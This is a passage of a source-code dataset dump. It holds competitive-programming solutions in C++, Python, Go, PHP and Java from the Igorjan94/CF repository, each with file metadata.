ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){os<<a[0];for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.4366295337677002, "alphanum_fraction": 0.45438718795776367, "avg_line_length": 25.592592239379883, "blob_id": "819f6a76515346ee0bc945d787af9b8712d77afd", "content_id": "c442e55e3731e1d064bedc3a50c11d1fece768e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2872, "license_type": "no_license", "max_line_length": 107, "num_lines": 108, "path": "/2019/GCJ1C/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(a.size())\n\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\n//Igorjan\n//}}}\n\nstring run()\n{\n int n;\n cin >> n;\n vector<string> a(n);\n fori(n)\n cin >> a[i];\n string ans;\n for (int i = 0; i < 500 * 500 && a.size(); ++i)\n {\n set<char> cur;\n for (auto& j : a)\n cur.insert(j[i % j.size()]);\n if (cur.size() == 3)\n return \"IMPOSSIBLE\";\n if (cur.size() == 1)\n {\n char c = *cur.begin();\n if (c == 'R')\n ans += 'P';\n else if (c == 'P')\n ans += 'S';\n else if (c == 'S')\n ans += 'R';\n return ans;\n }\n if (cur.size() == 2)\n {\n char c = *cur.begin();\n char d = *cur.rbegin();\n char b = '?';\n if (c > d) c = d;\n if (c == 'P' && d == 'R')\n b = 'P';\n else if (c == 'P' && d == 'S')\n b = 'S';\n else if (c == 'R' && d == 'S')\n b = 'R';\n ans += b;\n for (int j = SZ(a) - 1; j >= 0; --j)\n if (a[j][i % a[j].size()] != b)\n a.erase(a.begin() + j);\n }\n }\n if (a.size())\n return \"IMPOSSIBLE\";\n else\n return ans;\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n int t;\n cin >> t;\n fori(t)\n cout << \"Case #\" << (i + 1) << \": \" << run() << \"\\n\";\n#ifndef ONLINE_JUDGE\n //writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n" }, { "alpha_fraction": 0.4208776652812958, "alphanum_fraction": 0.4268617033958435, "avg_line_length": 21.787878036499023, "blob_id": "bc2cbd1f2409b5b75c2a7f06edb96304100cffe1", "content_id": "8f665d6ff57c08bf4012fae60a90bc474a97660f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1504, "license_type": "no_license", "max_line_length": 169, "num_lines": 66, "path": "/2020/back/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n#define fori(n) for (int i = 0; i < int(n); ++i)\n#define forj(n) for (int j = 0; j < int(n); ++j)\n#define pb push_back\n\nusing namespace std;\n\nvector<string>split(string&s,const string&d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nint n, k, s, x;\n\nbool get(const vector<string>& a, const vector<string>& b)\n{\n bool qq = false;\n fori(s) {\n if (a[i] == \"\" || b[i] == \"\")\n continue;\n if (a[i] == b[i])\n qq = true;\n else\n return false;\n }\n if (!qq)\n return false;\n for (int i = s; i < k; ++i) {\n if (a[i] == \"\" || b[i] == \"\")\n continue;\n if (a[i] != b[i])\n return false;\n }\n return true;\n}\n\nint main()\n{\n cin >> n >> k >> s;\n vector<int> q;\n fori(s)\n {\n cin >> x;\n q.push_back(x - 1);\n }\n fori(k)\n if (find(q.begin(), q.end(), i) == q.end())\n q.push_back(i);\n vector<vector<string>> a(n);\n string t;\n getline(cin, t);\n fori(n)\n {\n string t;\n getline(cin, t);\n auto temp = split(t, \"\\t\");\n forj(k)\n a[i].pb(temp[q[j]]);\n\n //cout << a[i].size() << endl;\n //forj(a[i].size())\n //cout << a[i][j] << endl;\n }\n int ans = 0;\n fori(n)\n for (int j = i + 1; j < n; ++j)\n ans += get(a[i], a[j]);\n cout << ans;\n return 0;\n}\n" }, { "alpha_fraction": 0.4804932177066803, "alphanum_fraction": 0.5041439533233643, "avg_line_length": 24.632123947143555, "blob_id": "9a04f62911c5121c35ce5c4d0d920af203ef2202", "content_id": "b42e2f22347c1b91c843aa4935b49bb7285e6902", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4947, "license_type": "no_license", "max_line_length": 174, "num_lines": 193, "path": "/CodeForce/1746/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\nstatic const int TREES = 40;\nstatic const int N = 3 * 100000 + 10;\nstatic const int Q = 3 * 100000 + 10;\n\n//Igorjan\n//rng\nmt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n\n//fenwickTree\n//1-indexed, [l, r]\ntemplate <typename T>\nstruct fenwickTree\n{\n int t[N];\n int n;\n\n fenwickTree()\n {\n n = N;\n fori(n) t[i] = 0;\n }\n\n fenwickTree(vector<T>& arr)\n {\n n = arr.size();\n fori(n)\n update(i + 1, arr[i]);\n }\n\n inline void update(int index, T value)\n {\n for (; index <= n; index += index & -index)\n t[index] += value;\n }\n\n inline T sum(int i)\n {\n T res = 0;\n for (; i; i -= i & -i)\n res += t[i];\n return res;\n }\n\n inline T sum(int l, int r)\n {\n return sum(r) - sum(l - 1);\n }\n\n T sum0(int l, int r)\n {\n return sum(r + 1) - sum(l);\n }\n};\n\n//}}}\n\nfenwickTree<int> trees[TREES];\nbitset<N + Q> used[TREES];\n\nstruct query {\n int type;\n int l, r, k;\n query() {}\n};\n\nistream& operator>>(istream& is, query& q) {\n is >> q.type;\n if (q.type == 1)\n is >> q.l >> q.k;\n else\n is >> q.l >> q.r >> q.k;\n return is;\n}\nvector<query> queries;\n\nvoid run()\n{\n ints(n, q);\n vi a(n);\n vector<query> queries(q);\n readln(a, queries);\n vector<array<int, 3>> coords;\n fori(n)\n coords.pb({a[i], 1, i});\n fori(q)\n if (queries[i].type == 1)\n coords.pb({queries[i].k, 0, i});\n sort(all(coords));\n\n int counter = 0;\n for (int i = 0; i < SZ(coords); )\n {\n int j = i;\n while (j < SZ(coords) && coords[j][0] == coords[i][0])\n ++j;\n FOR(k, i, j)\n if (coords[k][1] == 0)\n queries[coords[k][2]].k = counter;\n else\n a[coords[k][2]] = counter;\n\n ++counter;\n i = j;\n }\n\n fori(TREES)\n forj(N + Q)\n used[i][j] = (rng() & 1) != 0;\n\n fori(TREES)\n forj(n)\n if (used[i][a[j]])\n trees[i].update(j + 1, 1);\n\n for (auto& [t, l, r, k]: queries)\n {\n if (t == 2)\n {\n bool ok = (r - l + 1) % k == 0;\n for (int i = 0; i < TREES && ok; ++i)\n ok &= trees[i].sum(l, r) % k == 0;\n writeln(ok ? \"YES\" : \"NO\");\n }\n else\n {\n fori(TREES)\n {\n if (used[i][a[l - 1]])\n trees[i].update(l, -1);\n if (used[i][k])\n trees[i].update(l, 1);\n }\n a[l - 1] = k;\n }\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n cin.tie(0);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5088131427764893, "alphanum_fraction": 0.6509988307952881, "avg_line_length": 36, "blob_id": "ecb991771a5159c6977c9c2748dd85eb35e6db9e", "content_id": "883d6d75defce44a6185a9610a6760c145dc68fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1702, "license_type": "no_license", "max_line_length": 66, "num_lines": 46, "path": "/CodeForce/1769/D2.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "k = int(input())\nif k == 13:\n print('''6C TC JC QC 6D 8D 9D TD JD QD KD 7S 8S TS JS KS AS TH\n7C 8C 9C KC AC 7D AD 6S 9S QS 6H 7H 8H 9H JH QH KH AH\n\n6C 8C AC 6D 8D TD JD KD 6S 8S 9S TS JS QS 8H JH KH AH\n7C 9C TC JC QC KC 7D 9D QD AD 7S KS AS 6H 7H 9H TH QH\n\n6C 8C 9C QC KC AC 6D 7D JD AD 8S JS 6H 7H 8H 9H QH AH\n7C TC JC 8D 9D TD QD KD 6S 7S 9S TS QS KS AS TH JH KH\n\n8C TC QC AC 6D 7D TD QD KD 6S 7S JS QS KS 7H 9H TH JH\n6C 7C 9C JC KC 8D 9D JD AD 8S 9S TS AS 6H 8H QH KH AH\n\n6C 9C KC 6D 7D TD JD KD AD TS JS QS AS 9H TH JH QH AH\n7C 8C TC JC QC AC 8D 9D QD 6S 7S 8S 9S KS 6H 7H 8H KH\n\n7C 9C TC QC KC 8D AD 6S 7S 8S 9S JS AS 6H 7H 8H JH KH\n6C 8C JC AC 6D 7D 9D TD JD QD KD TS QS KS 9H TH QH AH\n\nTC JC QC AC 7D 8D AD 7S TS JS QS KS 7H 9H TH JH QH AH\n6C 7C 8C 9C KC 6D 9D TD JD QD KD 6S 8S 9S AS 6H 8H KH\n\n9C QC KC 6D 7D JD QD 6S 7S 8S JS AS 6H 7H 9H TH KH AH\n6C 7C 8C TC JC AC 8D 9D TD KD AD 9S TS QS KS 8H JH QH\n\n6C 6D 7D 8D 9D TD JD QD AD 6S 7S 8S TS QS 7H 8H JH QH\n7C 8C 9C TC JC QC KC AC KD 9S JS KS AS 6H 9H TH KH AH\n\n6C 8C JC QC KC AC 8D 9D 7S TS JS QS AS 7H 8H TH QH AH\n7C 9C TC 6D 7D TD JD QD KD AD 6S 8S 9S KS 6H 9H JH KH\n\n8C 9C 6D 9D KD 6S 7S 8S TS JS QS KS AS 7H 8H 9H KH AH\n6C 7C TC JC QC KC AC 7D 8D TD JD QD AD 9S 6H TH JH QH\n\n7C 8C 9C KC AC 6D 7D 9D JD 6S 8S TS QS KS AS 7H 9H QH\n6C TC JC QC 8D TD QD KD AD 7S 9S JS 6H 8H TH JH KH AH\n\n6C 8C JC KC AC 9D 9S TS QS KS AS 6H 7H 8H JH QH KH AH\n7C 9C TC QC 6D 7D 8D TD JD QD KD AD 6S 7S 8S JS 9H TH''')\nelse:\n print('''KS QD 8D QC 8S 8C JD 9H AC TH 9S 9D QH 7H 8H TS 7S 9C\n6D JS 7D KH QS TC AD AS KC 6C 7C TD AH KD 6S JC JH 6H\n\nJC JS 8S TD JD KH 7D 9C KC TH QD 8D 7H TC KD 9H 8C 6D\n7S AC QH AD 8H TS 6H JH 6C AH 7C 6S 9D QC AS QS KS 9S''')\n" }, { "alpha_fraction": 0.4587385356426239, "alphanum_fraction": 0.47179773449897766, "avg_line_length": 26.162263870239258, "blob_id": "7772da78568843cecc4382c038c27ae3545be12c", "content_id": "1b1a7450ddefdbae0ca5041b1572af58a0d00bc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7198, "license_type": "no_license", "max_line_length": 165, "num_lines": 265, "path": "/trains/neerc/neerc.ifmo.ru.train.2016.09.28/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n \n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n \n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n \ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n \nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return v;}\n \n///-------------------------------------------------------------------------------------------------------------------------------------\n//Igorjan\nstring colors = \"BGRWY\";\nint n, m;\nint cccc = 0;\nvector<vector<int>> sizes;\n \nstruct lol\n{\n int mc = -1, mx = 100, my = -1;\n char color;\n lol(){}\n \n const bool operator<(const lol& b) const {\n if (mc != b.mc)\n return mc > b.mc;\n if (my != b.my)\n return my > b.my;\n return mx < b.mx;\n }\n};\nvector<lol> sss;\n \nvoid dfs(vector<string>& f, int i, int j, lol& temp)\n{\n if (i < 0 || j < 0 || i == n || j == m || sizes[i][j] || f[i][j] != temp.color)\n return;\n sizes[i][j] = ++cccc;\n temp.mc = max(temp.mc, cccc);\n temp.mx = min(temp.mx, j);\n temp.my = max(temp.my, i);\n dfs(f, i + 1, j, temp);\n dfs(f, i - 1, j, temp);\n dfs(f, i, j + 1, temp);\n dfs(f, i, j - 1, temp);\n}\n \nvoid kill(vector<string>& f, int i, int j, char color)\n{\n if (i < 0 || j < 0 || i == n || j == m || f[i][j] != color || f[i][j] == 'P')\n return;\n f[i][j] = 'P';\n kill(f, i + 1, j, color);\n kill(f, i - 1, j, color);\n kill(f, i, j + 1, color);\n kill(f, i, j - 1, color);\n}\n \nlol hasColorToKill(vector<string>& f, char color)\n{\n sss.clear();\n fori(n)\n forj(m)\n sizes[i][j] = 0;\n lol notColor, isColor;\n fori(n)\n forj(m)\n if (sizes[i][j] == 0 && f[i][j] != 'P')\n {\n lol temp;\n temp.color = f[i][j];\n cccc = 0;\n dfs(f, i, j, temp);\n if (temp.mc > 1)\n if (color == f[i][j])\n isColor = min(isColor, temp);\n else\n notColor = min(notColor, temp);\n }\n if (notColor.mc != -1)\n return notColor;\n return isColor;\n}\n \nvoid toDown(vector<string>& f)\n{\n int col = -1;\n forj(m)\n {\n int last = -1;\n bool ok = true;\n for (int i = n - 1; i >= 0; --i)\n {\n ok &= f[i][j] == 'P';\n if (f[i][j] == 'P' && last == -1)\n last = i;\n if (f[i][j] != 'P' && last != -1)\n swap(f[i][j], f[last--][j]);\n }\n \n if (ok && col == -1)\n col = j;\n if (!ok && col != -1)\n {\n fori(n)\n swap(f[i][col], f[i][j]);\n col++;\n }\n }\n}\n \nvoid toLeft(vector<string>& f)\n{\n return;\n forn(q, n)\n forj(m)\n {\n int cc = 0;\n fori(n)\n cc += f[i][j] == 'P';\n if (cc == n && j + 1 < m)\n fori(n)\n swap(f[i][j], f[i][j + 1]);\n }\n}\n \nll proceed(vector<string> f, char color)\n{\n ll ans = 0;\n while (true)\n {\n lol temp = hasColorToKill(f, color);\n if (temp.mc == -1)\n return ans;\n ans += temp.mc * (temp.mc - 1);\n kill(f, temp.my, temp.mx, temp.color);\n// writeln(\"ans +=\", temp.mc, ans);\n //writeln(\"after kill\");\n //writeln(f);\n //cout.flush();\n //int qwerqwerwqer;\n // readln(qwerqwerwqer);\n toDown(f);\n toLeft(f);\n// writeln(\"after down and left\");\n //writeln(f);\n //cout.flush();\n// readln(qwerqwerwqer);\n }\n return ans;\n}\n \nvoid run()\n{\n readln(n, m);\n vector<string> s(n);\n readln(s);\n sizes.resize(n, vector<int>(m));\n \n for (char mainColor : colors)\n {\n fori(n)\n forj(m)\n if (s[i][j] == mainColor)\n {\n printf(\"%c: %lld\\n\", mainColor, proceed(s, mainColor));\n goto skip;\n }\n skip:\n 42;\n }\n}\n \n \nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n freopen(\"input.txt\", \"r\", stdin);\n freopen(\"output.txt\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n //writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.311970978975296, "alphanum_fraction": 0.3409915268421173, "avg_line_length": 18.690475463867188, "blob_id": "9dc7daf1288ccb8b0f05075de1911861171813d4", "content_id": "e97133b1b5a01bf71d002a501ee006f3ef434ee9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 827, "license_type": "no_license", "max_line_length": 67, "num_lines": 42, "path": "/CodeForce/0378/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <vector>\n\nusing namespace std;\n\nvector<vector<int>> b;\nint n, m, k, s1, s2;\n\nvoid bfs(int i, int j)\n{\n if (b[i][j] || !k)\n return;\n k--;\n b[i][j] = 2;\n bfs(i + 1, j);\n bfs(i - 1, j);\n bfs(i, j + 1);\n bfs(i, j - 1);\n}\n\nint main()\n{\n scanf(\"%d %d %d\\n\", &n, &m, &k);\n k = -k;\n b.resize(n + 2);\n for (int i = 0; i <= n + 1; i++)\n b[i].resize(m + 2, 1);\n for (int i = 1; i <= n; i++)\n for (int j = 1; j <= m + 1; j++)\n if (!(b[i][j] = (int)(getchar() != '.')))\n k++,\n s1 = i,\n s2 = j;\n bfs(s1, s2);\n for (int i = 1; i <= n; i++)\n {\n for (int j = 1; j <= m; j++)\n putchar(b[i][j] == 0 ? 'X' : b[i][j] == 1 ? '#' : '.');\n printf(\"\\n\");\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.6136363744735718, "alphanum_fraction": 0.6818181872367859, "avg_line_length": 43, "blob_id": "a3b8ea1aa317eddc7f30a9c0ff0f9e99838f5b8c", "content_id": "b4f794f6952d8a739fe4d54126e0faaeebb59f1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 44, "license_type": "no_license", "max_line_length": 43, "num_lines": 1, "path": "/CodeForce/0493/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "print(\"black\"if input()&1 else\"white\\n1 2\")\n" }, { "alpha_fraction": 0.4661538600921631, "alphanum_fraction": 0.48769229650497437, "avg_line_length": 26.08333396911621, "blob_id": "a1e034be3ffe0d25608744b3c388ab5a57bd0796", "content_id": "c37b3060bc0f6e33d72498427efeb1753031762d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 650, "license_type": "no_license", "max_line_length": 54, "num_lines": 24, "path": "/CodeForce/0411/allLanguages/go.go", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "package main\nimport (\n \"os\"\n \"bufio\"\n\"regexp\"\n)\n \nfunc main() {\n in := bufio.NewReader(os.Stdin)\n line, _ := in.ReadString('\\n')\n if (line[len(line)-1] == '\\n') {\n line = line[0 : len(line)-2]\n }\n match, _ := regexp.MatchString(\".{5,}\", line)\n match1, _ := regexp.MatchString(\"[0-9]\", line)\n match2, _ := regexp.MatchString(\"[a-z]\", line)\n match3, _ := regexp.MatchString(\"[A-Z]\", line)\n match4 := match && match2 && match3 && match1\n if (match4) {\n \t os.Stdout.WriteString(\"Correct\")\n } else {\n os.Stdout.WriteString(\"Too weak\") \n }\n}\n" }, { "alpha_fraction": 0.5461538434028625, "alphanum_fraction": 0.5589743852615356, "avg_line_length": 31.5, "blob_id": "ba47715cad819dfa1cd2028314d5682489f2800e", "content_id": "27a239563212581e97249e848d595525be7ff39e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 390, "license_type": "no_license", "max_line_length": 70, "num_lines": 12, "path": "/CodeForce/0411/allLanguages/php.php", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "<?php\n$line = trim(fgets(STDIN));\n$a = 0;\n$a = $a + preg_match('/.{5,}/', $line, $matches, PREG_OFFSET_CAPTURE);\n$a = $a + preg_match('/[a-z]/', $line, $matches, PREG_OFFSET_CAPTURE);\n$a = $a + preg_match('/[A-Z]/', $line, $matches, PREG_OFFSET_CAPTURE);\n$a = $a + preg_match('/[0-9]/', $line, $matches, PREG_OFFSET_CAPTURE);\nif ($a == 4)\n print 'Correct';\nelse\n print 'Too weak';\n?>\n" }, { "alpha_fraction": 0.5006693601608276, "alphanum_fraction": 0.5287817716598511, "avg_line_length": 15.090909004211426, "blob_id": "24c4f2c555785b3eb89ec98f7952d603f837ada7", "content_id": "d44b73f361438f3f81a1697db3be3bd69383cf5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 747, "license_type": "no_license", "max_line_length": 44, "num_lines": 44, "path": "/trash/writelnTemplate.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\r\n#include <vector>\r\n#include <cstdio>\r\n\r\nusing namespace std;\r\n\r\nvoid writeln_1()\r\n{\r\n printf(\"\\n\");\r\n return;\r\n}\r\n\r\ntemplate <class... Tail>\r\nvoid writeln_1(int head, Tail... tail)\r\n{\r\n printf(\" %d\", head);\r\n writeln_1(tail...);\r\n}\r\n\r\ntemplate <class... Tail>\r\nvoid writeln(int head, Tail... tail)\r\n{\r\n printf(\"%d\", head);\r\n writeln_1(tail...);\r\n}\r\n\r\nconstexpr int INF = 100;\r\n\r\nconstexpr int factorial (int n)\r\n{\r\n return n > 0 ? n * factorial(n - 1) : 1;\r\n}\r\nint main()\r\n{\r\n constexpr int x = factorial(11);\r\n writeln(x);\n vector<int> a;\n for (int i = 0; i < 12; i++)\n a.push_back(factorial(i));\n for (int s : a)\n writeln(s);\r\n writeln(1, 2, 3, 4, 5);\r\n return 0;\r\n}\r\n" }, { "alpha_fraction": 0.4598214328289032, "alphanum_fraction": 0.53125, "avg_line_length": 43.79999923706055, "blob_id": "76ab1aa31f699c364073f0d29c48d623a9e9f064", "content_id": "c8866bbf9f7b236c3e5391a886b7d81ea1884543", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 224, "license_type": "no_license", "max_line_length": 70, "num_lines": 5, "path": "/CodeForce/0501/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n[a, b, t1, t2] = list(map(int, sys.stdin.readline().split()))\na = max(3 * a // 10, a - a // 250 * t1)\nb = max(3 * b // 10, b - b // 250 * t2)\nsys.stdout.write(\"Vasya\" if a < b else (\"Tie\" if a == b else \"Misha\"))\n" }, { "alpha_fraction": 0.3782542049884796, "alphanum_fraction": 0.38629403710365295, "avg_line_length": 23.29767417907715, "blob_id": "3325bb67d991761426f28cbd9b4f80ba72e76df5", "content_id": "a88a179242df6ffc01e4ee2d2dbcf469bd662db2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 5224, "license_type": "no_license", "max_line_length": 80, "num_lines": 215, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.09.23/D.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.BufferedReader;\nimport java.io.File;\nimport java.io.FileNotFoundException;\nimport java.io.FileReader;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.io.PrintWriter;\nimport java.math.BigInteger;\n\nimport java.util.ArrayList;\nimport java.util.HashMap;\nimport java.util.List;\nimport java.util.Map;\nimport java.util.Map.Entry;\nimport java.util.StringTokenizer;\n\npublic class D {\n FastScanner in;\n PrintWriter out;\n\n final String taskName = null;\n\n void mull(BigInteger[] a, int n) {\n\n while (n > 1) {\n int m = 0;\n\n for (int i = 1; i < n; i += 2) {\n a[m++] = a[i - 1].multiply(a[i]);\n }\n\n if (n % 2 == 1) {\n a[m++] = a[n - 1];\n }\n n = m;\n }\n }\n\n class Pair {\n int p, n;\n\n Pair(int p, int n) {\n this.p = p;\n this.n = n;\n }\n\n }\n\n List<Pair> fac(int n) {\n List<Pair> ans = new ArrayList<Pair>();\n\n if (n == 0) {\n ans.add(new Pair(0, 1));\n return ans;\n }\n\n if (n == 1) {\n return ans;\n }\n\n for (int d = 2; d * d <= n; d++) {\n int m = 0;\n while (n % d == 0) {\n ++m;\n n /= d;\n }\n if (m > 0) {\n ans.add(new Pair(d, m));\n }\n }\n\n if (n > 1) {\n ans.add(new Pair(n, 1));\n }\n return ans;\n }\n\n void mull(Map<Integer, Integer> map, List<Pair> n) {\n for (Pair pair : n) {\n Integer e = 